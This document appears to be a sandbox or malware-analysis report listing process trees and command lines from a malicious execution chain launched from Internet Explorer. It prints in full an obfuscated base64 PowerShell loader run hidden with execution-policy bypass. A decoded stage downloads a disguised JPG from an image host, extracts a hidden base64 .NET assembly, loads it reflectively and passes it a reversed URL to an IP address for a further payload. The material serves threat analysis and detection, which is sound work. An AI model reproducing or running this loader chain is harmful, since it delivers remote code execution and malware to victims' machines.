€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€
GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€Ow€€k€€GE€€cgBn€€HU€€bQBl€€G4€€d€€Bz€€C€€€€PQ€€g€€Cw€€K€€€€n€€HQ€€e€€B0€€C4€€Z€€Bt€€GM€€awBo€€C8€€QgBJ€€C8€€Mg€€y€€DE€€Lg€€5€€DM€€Mg€€u€€DQ€€OQ€€u€€DM€€Mg€€v€€C8€€OgBw€€HQ€€d€€Bo€€Cc€€KQ€€7€€CQ€€bQBl€€HQ€€a€€Bv€€GQ€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€J€€Bh€€HI€€ZwB1€€G0€€ZQBu€€HQ€€cw€€p€€€€==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD |
parent_process | iexplore.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€dQBw€€Gw€€bwBh€€GQ€€Z€€Bl€€Gk€€bQBh€€Gc€€ZQBu€€HM€€LgBj€€G8€€bQ€€u€€GI€€cg€€v€€Gk€€bQBh€€Gc€€ZQBz€€C8€€M€€€€w€€DQ€€Lw€€1€€Dg€€Mw€€v€€DQ€€MQ€€x€€C8€€bwBy€€Gk€€ZwBp€€G4€€YQBs€€C8€€a€€B0€€GE€€LgBq€€H€€€€Zw€€/€€DE€€Ng€€5€€DI€€Ng€€1€€Dg€€Mg€€y€€Dk€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€
N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€Ow€€k€€GE€€cgBn€€HU€€bQBl€€G4€€d€€Bz€€C€€€€PQ€€g€€Cw€€K€€€€n€€HQ€€e€€B0€€C4€€Z€€Bt€€GM€€awBo€€C8€€QgBJ€€C8€€Mg€€y€€DE€€Lg€€5€€DM€€Mg€€u€€DQ€€OQ€€u€€DM€€Mg€€v€€C8€€OgBw€€HQ€€d€€Bo€€Cc€€KQ€€7€€CQ€€bQBl€€HQ€€a€€Bv€€GQ€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€J€€Bh€€HI€€ZwB1€€G0€€ZQBu€€HQ€€cw€€p€€€€==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD | ||||||
parent_process | iexplore.exe | martian_process | powershell -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€dQBw€€Gw€€bwBh€€GQ€€Z€€Bl€€Gk€€bQBh€€Gc€€ZQBu€€HM€€LgBj€€G8€€bQ€€u€€GI€€cg€€v€€Gk€€bQBh€€Gc€€ZQBz€€C8€€M€€€€w€€DQ€€Lw€€1€€Dg€€Mw€€v€€DQ€€MQ€€x€€C8€€bwBy€€Gk€€ZwBp€€G4€€YQBs€€C8€€a€€B0€€GE€€LgBq€€H€€€€Zw€€/€€DE€€Ng€€5€€DI€€Ng€€1€€Dg€€Mg€€y€€Dk€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€
GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€Ow€€k€€GE€€cgBn€€HU€€bQBl€€G4€€d€€Bz€€C€€€€PQ€€g€€Cw€€K€€€€n€€HQ€€e€€B0€€C4€€Z€€Bt€€GM€€awBo€€C8€€QgBJ€€C8€€Mg€€y€€DE€€Lg€€5€€DM€€Mg€€u€€DQ€€OQ€€u€€DM€€Mg€€v€€C8€€OgBw€€HQ€€d€€Bo€€Cc€€KQ€€7€€CQ€€bQBl€€HQ€€a€€Bv€€GQ€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€J€€Bh€€HI€€ZwB1€€G0€€ZQBu€€HQ€€cw€€p€€€€==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/583/411/original/hta.jpg?1692658229';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.dmckh/BI/221.932.49.32//:ptth');$method.Invoke($null, $arguments)" |
option | -noprofile | value | Does not load current user profile | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |